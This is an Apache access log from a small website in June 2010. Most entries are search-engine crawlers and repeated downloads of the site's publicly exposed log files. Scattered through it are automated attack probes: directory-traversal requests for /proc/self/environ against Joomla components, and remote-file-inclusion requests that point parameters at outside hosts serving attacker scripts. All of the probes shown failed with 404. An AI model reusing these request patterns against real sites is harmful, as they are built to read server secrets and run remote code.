193.47.80.41 - - [14/Jun/2010:20:05:04 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
184.73.42.139 - - [14/Jun/2010:20:22:23 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.virtualsupplynet.com"
184.73.42.139 - - [14/Jun/2010:20:22:23 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.virtualsupplynet.com"
184.73.42.139 - - [14/Jun/2010:20:42:46 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.virtualsupplynet.com"
193.47.80.41 - - [14/Jun/2010:20:55:08 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [14/Jun/2010:20:55:10 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
95.108.128.240 - - [14/Jun/2010:21:15:22 -0700] "GET /logs/access_100403.log HTTP/1.1" 200 36253 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
114.24.77.212 - - [14/Jun/2010:21:18:57 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.24.77.221 - - [14/Jun/2010:21:21:02 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
75.101.202.26 - - [14/Jun/2010:21:31:10 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.virtualsupplynet.com"
75.101.202.26 - - [14/Jun/2010:21:31:10 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.virtualsupplynet.com"
75.101.202.26 - - [14/Jun/2010:21:39:38 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.virtualsupplynet.com"
112.104.148.249 - - [14/Jun/2010:22:10:48 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
112.104.148.249 - - [14/Jun/2010:22:10:48 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
98.126.74.66 - - [14/Jun/2010:22:51:29 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
98.126.74.66 - - [14/Jun/2010:22:51:29 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
69.65.3.168 - - [14/Jun/2010:23:18:55 -0700] "GET /logs//index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.virtualsupplynet.com"
69.65.3.168 - - [14/Jun/2010:23:18:55 -0700] "GET /logs//index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.virtualsupplynet.com"
69.65.3.168 - - [14/Jun/2010:23:18:55 -0700] "GET /index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.virtualsupplynet.com"
69.65.3.168 - - [14/Jun/2010:23:18:55 -0700] "GET /index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.virtualsupplynet.com"
95.108.128.240 - - [14/Jun/2010:23:44:44 -0700] "GET /logs/access_100417.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
118.170.193.13 - - [15/Jun/2010:00:08:47 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
208.80.193.37 - - [15/Jun/2010:00:41:43 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {36917DFA-7EE2-42F6-8190-ABFDF7694E3E}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/Jun/2010:00:43:42 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/Jun/2010:00:43:42 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
192.228.230.3 - - [15/Jun/2010:01:24:50 -0700] "GET /logs/access.log HTTP/1.1" 200 56753 "-" "Mozilla/8.0" "www.virtualsupplynet.com"
114.42.224.84 - - [15/Jun/2010:01:55:53 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
222.231.42.196 - - [15/Jun/2010:02:07:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MSIE or Firefox mutant; not on Windows server; +http://ws.daum.net/aboutWebSearch.html) Daumoa/2.0" "virtualsupplynet.com"
222.231.42.196 - - [15/Jun/2010:02:07:07 -0700] "GET / HTTP/1.1" 200 779 "http://virtualsupplynet.com/" "Mozilla/5.0 (compatible; MSIE or Firefox mutant; not on Windows server; +http://ws.daum.net/aboutWebSearch.html) Daumoa/2.0" "virtualsupplynet.com"
95.108.128.240 - - [15/Jun/2010:02:13:04 -0700] "GET /logs/access_100612.log HTTP/1.1" 200 104934 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
92.42.210.108 - - [15/Jun/2010:02:19:36 -0700] "GET /logs/access_100227.log HTTP/1.1" 200 84763 "http://yandex.ru/yandsearch?text=83.103.72.130&lr=213" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "www.virtualsupplynet.com"
92.42.210.108 - - [15/Jun/2010:02:19:38 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "www.virtualsupplynet.com"
95.108.150.235 - - [15/Jun/2010:03:40:42 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [15/Jun/2010:03:40:43 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [15/Jun/2010:03:40:43 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [15/Jun/2010:03:40:45 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [15/Jun/2010:03:40:45 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [15/Jun/2010:03:40:47 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.128.240 - - [15/Jun/2010:04:39:20 -0700] "GET /logs/access_100605.log HTTP/1.1" 200 125664 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
208.92.233.45 - - [15/Jun/2010:06:05:10 -0700] "GET /logs//config.inc.php?path_escape=http://ruffnes.00freehost.com/v6.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
208.92.233.45 - - [15/Jun/2010:06:05:10 -0700] "GET /config.inc.php?path_escape=http://ruffnes.00freehost.com/v6.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
208.92.233.45 - - [15/Jun/2010:06:08:14 -0700] "GET /logs//config.inc.php?path_escape= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
208.92.233.45 - - [15/Jun/2010:06:08:14 -0700] "GET /config.inc.php?path_escape= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
174.121.237.135 - - [15/Jun/2010:06:53:50 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
174.121.237.135 - - [15/Jun/2010:06:53:50 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
112.105.225.173 - - [15/Jun/2010:07:29:44 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.24.78.100 - - [15/Jun/2010:08:29:18 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.24.78.100 - - [15/Jun/2010:08:29:18 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.44.23.81 - - [15/Jun/2010:08:57:00 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
98.126.74.66 - - [15/Jun/2010:10:00:13 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [15/Jun/2010:11:17:41 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [15/Jun/2010:11:17:42 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
208.80.193.40 - - [15/Jun/2010:11:27:49 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; YPC 3.2.0; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.4; yplus 5.1.04b)" "virtualsupplynet.com"
216.18.213.162 - - [15/Jun/2010:11:46:36 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
61.31.133.44 - - [15/Jun/2010:11:46:57 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
61.31.133.44 - - [15/Jun/2010:11:47:00 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
211.74.92.138 - - [15/Jun/2010:12:36:37 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
211.74.92.138 - - [15/Jun/2010:12:36:39 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
95.108.142.138 - - [15/Jun/2010:13:17:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [15/Jun/2010:13:17:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [15/Jun/2010:13:17:05 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [15/Jun/2010:13:17:06 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [15/Jun/2010:13:17:07 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [15/Jun/2010:13:17:08 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
77.88.31.246 - - [15/Jun/2010:13:28:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
216.18.213.162 - - [15/Jun/2010:13:35:10 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.97.239.115 - - [15/Jun/2010:14:17:14 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.virtualsupplynet.com"
216.97.239.115 - - [15/Jun/2010:14:17:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.virtualsupplynet.com"
216.97.239.115 - - [15/Jun/2010:14:17:29 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.virtualsupplynet.com"
216.97.239.115 - - [15/Jun/2010:14:17:29 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.virtualsupplynet.com"
98.126.74.66 - - [15/Jun/2010:14:24:31 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.44.8.154 - - [15/Jun/2010:15:03:06 -0700] "GET /logs/access_100522.log HTTP/1.0" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.45.170.234 - - [15/Jun/2010:15:41:20 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
88.250.57.232 - - [15/Jun/2010:16:39:12 -0700] "GET /logs/access_100614.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [15/Jun/2010:16:39:13 -0700] "GET /logs/access_100615.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
208.92.233.45 - - [15/Jun/2010:17:17:41 -0700] "GET /logs/config.inc.php?path_escape= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
208.92.233.45 - - [15/Jun/2010:17:17:41 -0700] "GET /config.inc.php?path_escape= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
64.246.3.210 - - [15/Jun/2010:18:41:59 -0700] "GET /logs//index.php?option=com_uhp&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
64.246.3.210 - - [15/Jun/2010:18:41:59 -0700] "GET /index.php?option=com_uhp&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
64.246.3.210 - - [15/Jun/2010:18:42:01 -0700] "GET /logs//index.php?option=com_uhp&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
64.246.3.210 - - [15/Jun/2010:18:42:01 -0700] "GET /index.php?option=com_uhp&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
77.88.31.246 - - [15/Jun/2010:18:44:19 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
207.58.183.16 - - [15/Jun/2010:20:31:10 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
207.58.183.16 - - [15/Jun/2010:20:31:10 -0700] "GET /index.php?option=com_virtuemart&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
207.58.183.16 - - [15/Jun/2010:20:31:31 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
207.58.183.16 - - [15/Jun/2010:20:31:31 -0700] "GET /index.php?option=com_virtuemart&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
111.248.161.91 - - [15/Jun/2010:20:51:20 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/Jun/2010:21:19:39 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/Jun/2010:21:19:39 -0700] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
60.234.132.61 - - [15/Jun/2010:21:22:51 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
60.234.132.61 - - [15/Jun/2010:21:22:53 -0700] "GET /index.php?option=com_virtuemart&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
72.55.146.200 - - [15/Jun/2010:21:45:17 -0700] "GET /includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
72.55.146.200 - - [15/Jun/2010:21:45:17 -0700] "GET /logs/includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
66.235.124.132 - - [15/Jun/2010:22:33:44 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
66.235.124.132 - - [15/Jun/2010:22:33:44 -0700] "GET /logs/access_081220.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.virtualsupplynet.com"
207.46.13.93 - - [15/Jun/2010:22:42:58 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.13.93 - - [15/Jun/2010:22:44:11 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
98.126.74.66 - - [15/Jun/2010:23:03:00 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
77.88.31.246 - - [16/Jun/2010:01:39:28 -0700] "GET /logs/access.log HTTP/1.1" 200 70174 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
216.18.213.162 - - [16/Jun/2010:02:23:25 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [16/Jun/2010:03:54:49 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
58.248.86.30 - - [16/Jun/2010:04:10:14 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [16/Jun/2010:04:11:00 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [16/Jun/2010:04:13:13 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
58.249.88.141 - - [16/Jun/2010:04:35:34 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
72.94.249.37 - - [16/Jun/2010:04:55:31 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.virtualsupplynet.com"
208.80.193.30 - - [16/Jun/2010:05:13:50 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; Comcast Install 1.0; (R1 1.5))" "www.virtualsupplynet.com"
98.126.74.66 - - [16/Jun/2010:07:14:40 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
121.88.4.141 - - [16/Jun/2010:07:23:13 -0700] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.88.4.141 - - [16/Jun/2010:07:23:13 -0700] "GET /logs/access_100515.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.88.4.141 - - [16/Jun/2010:07:23:14 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.88.4.141 - - [16/Jun/2010:07:26:03 -0700] "GET /logs/access_100410.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
77.88.31.246 - - [16/Jun/2010:08:37:37 -0700] "GET /logs/access_100424.log HTTP/1.1" 200 61491 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
202.124.135.201 - - [16/Jun/2010:09:27:06 -0700] "GET /logs/upgrade_album.php?http://www.flinthillschurch.com/navigation/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.virtualsupplynet.com"
202.124.135.201 - - [16/Jun/2010:09:27:06 -0700] "GET /upgrade_album.php?http://www.flinthillschurch.com/navigation/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.virtualsupplynet.com"
111.248.161.85 - - [16/Jun/2010:09:42:47 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
111.248.161.85 - - [16/Jun/2010:09:42:49 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [16/Jun/2010:10:09:08 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
202.124.135.201 - - [16/Jun/2010:11:04:36 -0700] "GET /logs/modules/xgallery/upgrade_album.php?http://www.flinthillschurch.com/navigation/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.virtualsupplynet.com"
202.124.135.201 - - [16/Jun/2010:11:04:37 -0700] "GET /modules/xgallery/upgrade_album.php?http://www.flinthillschurch.com/navigation/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.virtualsupplynet.com"
203.73.222.34 - - [16/Jun/2010:11:11:56 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [16/Jun/2010:11:31:15 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
219.136.175.234 - - [16/Jun/2010:11:50:58 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.108.151.149 - - [16/Jun/2010:13:46:53 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
114.108.151.149 - - [16/Jun/2010:13:46:54 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
114.108.151.149 - - [16/Jun/2010:13:47:16 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
114.108.151.149 - - [16/Jun/2010:13:47:17 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
216.18.213.162 - - [16/Jun/2010:14:29:44 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
87.252.2.168 - - [16/Jun/2010:14:52:24 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamus1.fileave.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
87.252.2.168 - - [16/Jun/2010:14:52:24 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamus1.fileave.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
202.130.32.19 - - [16/Jun/2010:14:55:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamus1.fileave.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
202.130.32.19 - - [16/Jun/2010:14:55:51 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamus1.fileave.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
77.88.31.246 - - [16/Jun/2010:15:26:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
